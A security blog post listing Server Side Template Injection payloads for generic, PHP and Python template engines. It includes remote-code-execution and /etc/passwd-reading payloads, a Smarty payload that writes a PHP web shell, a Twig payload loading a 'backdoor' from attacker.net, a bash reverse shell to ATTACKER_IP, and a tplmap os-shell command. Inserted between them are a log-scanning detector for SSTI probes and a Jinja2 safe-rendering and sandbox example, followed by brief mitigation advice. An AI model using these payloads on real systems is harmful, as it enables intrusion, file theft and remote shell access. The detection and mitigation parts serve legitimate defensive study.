Server Side Template Injection (SSTI) is a critical web vulnerability that occurs when an attacker injects malicious template directives into user inputs, leading to remote code execution (RCE) or sensitive data exposure. Below are various SSTI payloads categorized by programming languages.
Generic SSTI Payloads
${{<%[%'"}}%\.
{% debug %}
{7*7}
{{ '7'*7 }}
{2*2}[[bash]]
<%= 7*7 %>
{3*3}
{ 3*3 }
[[bash]]
${2*2}
@(3*3)
${= 3*3}
{{= 7*7}}
${{7*7}}
{7*7}
[=7*7]
{{ request }}
{{self}}
{{dump(app)}}
{{ [].__class__.__base__.__subclasses__() }}
{{''.__class__.mro()[bash].__subclasses__()}}
{% for c in [1,2,3] %}{{ c,c,c }}{% endfor %}
{{ [].__class__.__base__.__subclasses__() }}
{{['cat%20/etc/passwd']|filter('system')}}
PHP SSTI Payloads
{php}print "Hello"{/php}
{php}$s = file_get_contents('/etc/passwd',NULL, NULL, 0, 100); var_dump($s);{/php}
{{dump(app)}}
{{app.request.server.all|join(',')}}
"{{'/etc/passwd'|file_excerpt(1,30)}}"@
{{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}}
{$smarty.version}
{php}echo id;{/php}
{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php passthru($_GET['cmd']); ?>",self::clearConfig())}
Python SSTI Payloads
{% debug %}
{{settings.SECRET_KEY}}
{% import foobar %} = Error
{% import os %}{{os.system('whoami')}}
You Should Know: Testing & Exploiting SSTI
1. Detecting SSTI
Use basic arithmetic operations to test for SSTI:
{{7*7}}
${7*7}
<%= 7*7 %>
If the output is 49, SSTI is likely present.
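The same arithmetic probe is what a defender should look for in traffic. The following detector is an added example, not code from the original post: it URL-decodes the request target of constructed access-log lines, finds template delimiters, and grades each hit by whether it carries the arithmetic probe, a Python object-walk attribute (`__class__`, `__mro__`, ...), or only bare template syntax (a weak signal on its own). The log format and sample lines are assumptions.

```python
import re
from urllib.parse import unquote_plus

# Delimiter pairs used by common template engines (Jinja2/Twig, Freemarker,
# ERB, Smarty). A matched pair alone is only a weak signal.
TEMPLATE_DELIMITERS = {
    "mustache": re.compile(r"\{\{(.+?)\}\}", re.S),
    "dollar_brace": re.compile(r"\$\{(.+?)\}", re.S),
    "erb": re.compile(r"<%=?(.+?)%>", re.S),
    "statement": re.compile(r"\{%(.+?)%\}", re.S),
    "smarty_php": re.compile(r"\{php\}(.+?)\{/php\}", re.S),
}

# Stronger signals inside a delimiter: the arithmetic probe (7*7 -> 49) and
# the dunder attributes used to walk from a string object to os.system().
ARITHMETIC_PROBE = re.compile(r"\b\d+\s*\*\s*\d+\b")
DUNDER_WALK = re.compile(r"__(class|mro|subclasses|globals|init|builtins)__|\bmro\(\)")


def scan_value(value):
    """Return (signal, snippet) tuples found in one decoded request value."""
    findings = []
    for name, pattern in TEMPLATE_DELIMITERS.items():
        for m in pattern.finditer(value):
            inner = m.group(1)
            if ARITHMETIC_PROBE.search(inner):
                findings.append(("arithmetic_probe", m.group(0)))
            elif DUNDER_WALK.search(inner):
                findings.append(("object_walk", m.group(0)))
            else:
                findings.append(("template_syntax:" + name, m.group(0)))
    return findings


def scan_access_log(lines):
    """Scan combined-format access-log lines; return (line_no, signal, snippet)."""
    hits = []
    for n, line in enumerate(lines, 1):
        # Pull the request target out of the quoted request line.
        m = re.search(r'"(?:GET|POST|PUT) (\S+)', line)
        if not m:
            continue
        target = unquote_plus(m.group(1))  # decode %7B%7B -> {{ before matching
        for signal, snippet in scan_value(target):
            hits.append((n, signal, snippet))
    return hits


# Constructed sample log lines (not real traffic, hypothetical hosts and paths).
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /page?input=test HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /page?input=%7B%7B7*7%7D%7D HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /page?input=%7B%7B%27%27.__class__.__mro__%7D%7D HTTP/1.1" 500 0',
    '10.0.0.7 - - [01/Jan/2024:10:00:03 +0000] "GET /search?q=%3C%25%3D+7*7+%25%3E HTTP/1.1" 200 300',
    '10.0.0.3 - - [01/Jan/2024:10:00:04 +0000] "GET /page?input=%7B%7Bname%7D%7D HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print(hit)
```

Only the query string is inspected here; in practice the same `scan_value` should also run over decoded POST bodies, headers such as `User-Agent` and `Referer`, and cookie values, since any of them may end up in a template. Treat `arithmetic_probe` and `object_walk` hits as alerts and `template_syntax` hits as context to correlate with 500 responses.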
2. Exploiting SSTI for RCE (Linux/Windows)
Linux Command Execution
{{ ''.__class__.__mro__[bash].__subclasses__()[X].__init__.__globals__['os'].system('id') }}
Replace `X` with the correct subclass index (commonly between 300-400).
Windows Command Execution
{{config.__class__.__init__.__globals__['os'].popen('whoami').read()}}
3. Reading Files via SSTI
{{ ''.__class__.__mro__[bash].__subclasses__()[X].__init__.__globals__['open']('/etc/passwd').read() }}
4. Reverse Shell via SSTI
{{ ''.__class__.__mro__[bash].__subclasses__()[X].__init__.__globals__['os'].system('bash -c "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"') }}
5. Automated Exploitation with tplmap
python tplmap.py -u "http://vuln-site.com/page?input=test" --os-shell
What Undercode Says
SSTI is a powerful attack vector that can lead to full system compromise if not mitigated. Always:
– Validate and sanitize user input before it reaches the template engine.
– Use sandboxed environments for template rendering.
– Keep template engines updated.
– Test applications with SSTI payloads before deployment.
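To make the first two points concrete for the Python payloads above, here is an added example (not code from the original post) using Jinja2, which the `__class__`/`__mro__` payloads target. It contrasts the vulnerable pattern (user input concatenated into the template source) with the fix (a constant template, user input passed as data) and with `SandboxedEnvironment` as defence in depth. The greeting template and the `render_*` function names are assumptions; the package `jinja2` must be installed.

```python
from jinja2 import Environment
from jinja2.sandbox import SandboxedEnvironment, SecurityError

# Inputs used for the demonstration: the arithmetic probe from the post and
# the first step of the Python object walk.
PROBE = "{{ 7*7 }}"
OBJECT_WALK = "{{ ''.__class__.__mro__ }}"


def render_vulnerable(user_input: str) -> str:
    """Anti-pattern: user input becomes part of the template *source*, so the
    engine parses and evaluates any directive it contains."""
    env = Environment(autoescape=True)
    return env.from_string("Hello " + user_input).render()


def render_safe(user_input: str) -> str:
    """Fix: the template source is a constant and user input is passed as
    data. The engine never parses the input, so {{ }} inside it is plain
    text, and autoescape still neutralises HTML for the browser."""
    env = Environment(autoescape=True)
    return env.from_string("Hello {{ name }}").render(name=user_input)


def render_sandboxed(user_input: str):
    """Defence in depth for features where the template source really is
    user-controlled (e.g. a mail-merge editor): the sandbox refuses access to
    underscore attributes and raises SecurityError on the object walk. It does
    NOT stop ordinary template logic, so 7*7 still evaluates to 49."""
    env = SandboxedEnvironment(autoescape=True)
    try:
        return env.from_string("Hello " + user_input).render()
    except SecurityError:
        return None  # blocked by the sandbox


if __name__ == "__main__":
    print("vulnerable:", render_vulnerable(PROBE))      # Hello 49
    print("safe:      ", render_safe(PROBE))            # Hello {{ 7*7 }}
    print("sandboxed: ", render_sandboxed(PROBE))       # Hello 49
    print("sandboxed: ", render_sandboxed(OBJECT_WALK)) # None
```

The takeaway for the "sandboxed environments" bullet: the sandbox is a second layer, not a substitute for keeping untrusted input out of template source. Flask's `render_template_string(user_input)` is the same anti-pattern as `render_vulnerable` and should be replaced by a file template plus keyword arguments.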
Expected Output:
A fully compromised system if SSTI is unpatched, leading to unauthorized command execution, data theft, or reverse shell access.
Reported By: Zlatanh Ssti – Hackers Feeds